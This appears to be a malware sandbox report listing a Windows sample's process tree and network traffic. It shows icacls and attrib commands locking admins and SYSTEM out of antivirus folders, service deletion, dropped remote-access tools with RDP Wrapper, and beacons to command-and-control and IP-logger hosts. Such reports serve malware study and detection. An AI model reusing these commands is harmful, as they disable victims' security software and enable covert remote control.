C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat4⤵
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"5⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)5⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"5⤵
- Views/modifies file attributes
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
Network
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1 -
GEThttp://ip-api.com/jsonRemote address:208.95.112.1:80RequestGET /json HTTP/1.1
User-Agent: AutoIt
Host: ip-api.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:44:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
DNSstcubegames.netxi.inRemote address:8.8.8.8:53Requeststcubegames.netxi.inIN AResponsestcubegames.netxi.inIN A185.143.145.9
-
POSThttp://stcubegames.netxi.in/index.phpRemote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 101
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:44:34 GMT
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
POSThttp://stcubegames.netxi.in/index.phpRemote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 4230
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:44:43 GMT
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
DNSrms-server.tektonit.ruRemote address:8.8.8.8:53Requestrms-server.tektonit.ruIN AResponserms-server.tektonit.ruIN A185.175.44.167
-
GEThttp://ip-api.com/jsonRemote address:208.95.112.1:80RequestGET /json HTTP/1.1
User-Agent: AutoIt
Host: ip-api.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:44:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 41
X-Rl: 43
-
DNSfreemail.freehost.com.uaRemote address:8.8.8.8:53Requestfreemail.freehost.com.uaIN AResponsefreemail.freehost.com.uaIN A194.0.200.251
-
DNSiplogger.orgRemote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A88.99.66.31
-
GEThttps://iplogger.org/1kcM87Remote address:88.99.66.31:443RequestGET /1kcM87 HTTP/1.1
User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 22335)
Host: iplogger.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Nov 2020 14:44:58 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j1ttrgj6dpvmqmor0nmm1dlrf6; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 521d137b917286881284f12c9bb4eb0b0b063a2e8420115c5672994cf759a405
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
DNStaskhostw.comRemote address:8.8.8.8:53Requesttaskhostw.comIN AResponsetaskhostw.comIN A152.89.218.85
-
GEThttp://taskhostw.com/randomx/STATUS.htmlRemote address:152.89.218.85:80RequestGET /randomx/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:45:04 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:14:56 GMT
ETag: "6-5b3fe7dbcabb3"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
GEThttp://taskhostw.com/randomx/loaderTOP.htmlRemote address:152.89.218.85:80RequestGET /randomx/loaderTOP.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Wed, 18 Nov 2020 14:45:04 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
-
GEThttp://taskhostw.com/randomx/Login.htmlRemote address:152.89.218.85:80RequestGET /randomx/Login.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:45:04 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:14:55 GMT
ETag: "4-5b3fe7dba7936"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
GEThttp://taskhostw.com/randomx/Password.htmlRemote address:152.89.218.85:80RequestGET /randomx/Password.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:45:04 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:14:56 GMT
ETag: "c-5b3fe7dbb1575"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
GEThttp://taskhostw.com/randomx/Server.htmlRemote address:152.89.218.85:80RequestGET /randomx/Server.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:45:04 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:14:56 GMT
ETag: "e-5b3fe7dbbc155"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
DNSraw.githubusercontent.comRemote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN CNAMEgithub.map.fastly.netgithub.map.fastly.netIN A151.101.0.133github.map.fastly.netIN A151.101.64.133github.map.fastly.netIN A151.101.128.133github.map.fastly.netIN A151.101.192.133
-
GEThttps://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRemote address:151.101.0.133:443RequestGET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
Date: Wed, 18 Nov 2020 14:45:04 GMT
X-Served-By: cache-ams21057-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605710705.528817,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: ea089703bf8588c33a763b0c4221887384cd053f
Expires: Wed, 18 Nov 2020 14:50:04 GMT
Source-Age: 170
-
GEThttps://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRemote address:151.101.0.133:443RequestGET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
